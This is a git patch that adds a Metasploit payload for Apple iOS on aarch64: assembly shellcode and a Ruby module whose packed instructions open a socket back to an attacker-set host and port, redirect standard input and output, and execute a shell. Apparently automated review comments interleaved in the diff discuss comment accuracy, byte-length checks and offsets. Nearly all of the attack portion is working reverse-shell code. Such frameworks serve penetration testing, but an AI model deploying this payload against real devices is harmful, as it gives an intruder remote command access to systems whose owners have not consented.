From 358aca943508357b852dabdab5f6ad46cb8faef4 Mon Sep 17 00:00:00 2001
From: Tim
Date: Tue, 19 Dec 2017 15:39:29 +0800
Subject: [PATCH] apple_ios/aarch64/shell_reverse_tcp
---
 .../aarch64/single_reverse_tcp_shell.s | 72 ++++++++++++++
 .../apple_ios/aarch64/shell_reverse_tcp.rb | 97 +++++++++++++++++++
 2 files changed, 169 insertions(+)
 create mode 100644 external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s
 create mode 100644 modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb
diff --git a/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s b/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s
new file mode 100644
index 0000000000..1166d26202
--- /dev/null
+++ b/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s
@@ -0,0 +1,72 @@
+.equ SYS_SOCKET, 0x61
+.equ SYS_CONNECT, 0x62
+.equ SYS_DUP2, 0x5a
+.equ SYS_EXECVE, 0x3b
+.equ SYS_EXIT, 0x01
+
+.equ AF_INET, 0x2
+.equ SOCK_STREAM, 0x1
+
+.equ STDIN, 0x0
+.equ STDOUT, 0x1
+.equ STDERR, 0x2
+
+.equ IP, 0x0100007f
+.equ PORT, 0x5C11
+
+_start:
+ // sockfd = socket(AF_INET, SOCK_STREAM, 0)
+ mov x0, AF_INET
+ mov x1, SOCK_STREAM
+ mov x2, 0
+ mov x16, SYS_SOCKET
+ svc 0
+ mov x3, x0
+
+ // connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
+ adr x1, sockaddr
+ mov x2, 0x10
+ mov x16, SYS_CONNECT
+ svc 0
+ cbnz w0, exit
+
+ // dup2(sockfd, STDIN) ...
+ mov x0, x3
+ mov x2, 0
+ mov x1, STDIN
+ mov x16, SYS_DUP2
+ svc 0
+ mov x1, STDOUT
+ mov x16, SYS_DUP2
+ svc 0
+ mov x1, STDERR
+ mov x16, SYS_DUP2
+ svc 0
+
+ // execve('/system/bin/sh', NULL, NULL)
+ adr x0, shell
+ mov x2, 0
+ str x0, [sp, 0]
+ str x2, [sp, 8]
+ mov x1, sp
+ mov x16, SYS_EXECVE
+ svc 0
+
+exit:
+ mov x0, 0
+ mov x16, SYS_EXIT
+ svc 0
+
+.balign 4
+sockaddr:
+ .short AF_INET
+ .short PORT
+ .word IP
+
+shell:
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+end:
+ 
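Review bot: The comment `// execve('/system/bin/sh', NULL, NULL)` above the execve block does not describe what runs: the path argument is the zero-filled 16-byte `shell:` buffer, which the accompanying Ruby module overwrites at runtime (its default is `/bin/sh`), and the `/system/bin/sh` path reads like a carry-over from an Android variant. Suggest `// execve(shell, NULL, NULL) -- 'shell' is a 16-byte NUL-filled buffer patched by the module at runtime (default /bin/sh); at least one trailing NUL must remain`. For the same reason `IP`/`PORT` and the `sockaddr:` block deserve a one-line note that 127.0.0.1:4444 are placeholders rewritten through the module's LHOST/LPORT offsets, so a reader does not assume the listener address is baked into the source. The `.word 0x00000000` lines under `shell:` would also benefit from a comment tying their size to the module's 16-byte limit, since shrinking the buffer here silently breaks that check.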
diff --git a/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb
new file mode 100644
index 0000000000..7dca1d0ee2
--- /dev/null
+++ b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb
@@ -0,0 +1,97 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+ CachedSize = 152
+
+ include Msf::Payload::Single
+ include Msf::Payload::Linux
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Apple iOS aarch64 Command Shell, Reverse TCP Inline',
+ 'Description' => 'Connect back to attacker and spawn a command shell',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'apple_ios',
+ 'Arch' => ARCH_AARCH64,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::CommandShellUnix,
+ 'Payload' =>
+ {
+ 'Offsets' =>
+ {
+ 'LHOST' => [ 132, 'ADDR' ],
+ 'LPORT' => [ 130, 'n' ],
+ },
+ 'Payload' =>
+ [
+ # Generated from external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s
+ 0xd2800040, # mov x0, #0x2 // #2
+ 0xd2800021, # mov x1, #0x1 // #1
+ 0xd2800002, # mov x2, #0x0 // #0
+ 0xd2800c30, # mov x16, #0x61 // #97
+ 0xd4000001, # svc #0x0
+ 0xaa0003e3, # mov x3, x0
+ 0x10000341, # adr x1, 80
+ 0xd2800202, # mov x2, #0x10 // #16
+ 0xd2800c50, # mov x16, #0x62 // #98
+ 0xd4000001, # svc #0x0
+ 0x35000260, # cbnz w0, 74
+ 0xaa0303e0, # mov x0, x3
+ 0xd2800002, # mov x2, #0x0 // #0
+ 0xd2800001, # mov x1, #0x0 // #0
+ 0xd2800b50, # mov x16, #0x5a // #90
+ 0xd4000001, # svc #0x0
+ 0xd2800021, # mov x1, #0x1 // #1
+ 0xd2800b50, # mov x16, #0x5a // #90
+ 0xd4000001, # svc #0x0
+ 0xd2800041, # mov x1, #0x2 // #2
+ 0xd2800b50, # mov x16, #0x5a // #90
+ 0xd4000001, # svc #0x0
+ 0x10000180, # adr x0, 88
+ 0xd2800002, # mov x2, #0x0 // #0
+ 0xf90003e0, # str x0, [sp]
+ 0xf90007e2, # str x2, [sp,#8]
+ 0x910003e1, # mov x1, sp
+ 0xd2800770, # mov x16, #0x3b // #59
+ 0xd4000001, # svc #0x0
+ 0xd2800000, # mov x0, #0x0 // #0
+ 0xd2800030, # mov x16, #0x1 // #1
+ 0xd4000001, # svc #0x0
+ 0x5c110002, # .word 0x5c110002
+ 0x0100007f, # .word 0x0100007f
+ 0x00000000, # .word 0x00000000 // shell
+ 0x00000000, # .word 0x00000000
+ 0x00000000, # .word 0x00000000
+ 0x00000000, # .word 0x00000000
+ ].pack("V*")
+ }
+ ))
+
+ # Register command execution options
+ register_options(
+ [
+ OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]),
+ ])
+ end
+
+ def generate
+ p = super
+
+ sh = datastore['SHELL']
+ if sh.length >= 16
+ raise ArgumentError, "The specified shell must be less than 16 bytes."
+ end
+ p[136, sh.length] = sh
+
+ p
+ end
+end
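Review bot: In `generate` the SHELL bound is checked with `sh.length`, which counts characters, but the buffer it is spliced into at offset 136 is 16 raw bytes; a path that is under 16 characters yet 16 or more bytes passes the check, and `p[136, sh.length] = sh` then either raises on the encoding mismatch or replaces fewer bytes than it inserts, so both lines should use byte semantics: `raise ArgumentError, "The specified shell must be less than 16 bytes." if sh.empty? || sh.bytesize >= 16` and `p[136, sh.bytesize] = sh`. The `sh.empty?` part matters too, since an empty SHELL currently passes silently and hands execve an all-NUL path. The constants 130, 132 and 136 are the byte offsets of the `.short PORT`, `.word IP` and `shell:` words in the packed array and deserve a comment (or named constants) so that regenerating the array from the `.s` source keeps them in sync with `CachedSize = 152`. Finally, `include Msf::Payload::Linux` under a `'Platform' => 'apple_ios'` module looks like a carry-over from the Linux aarch64 payload; worth confirming the mixin is intended rather than incidental.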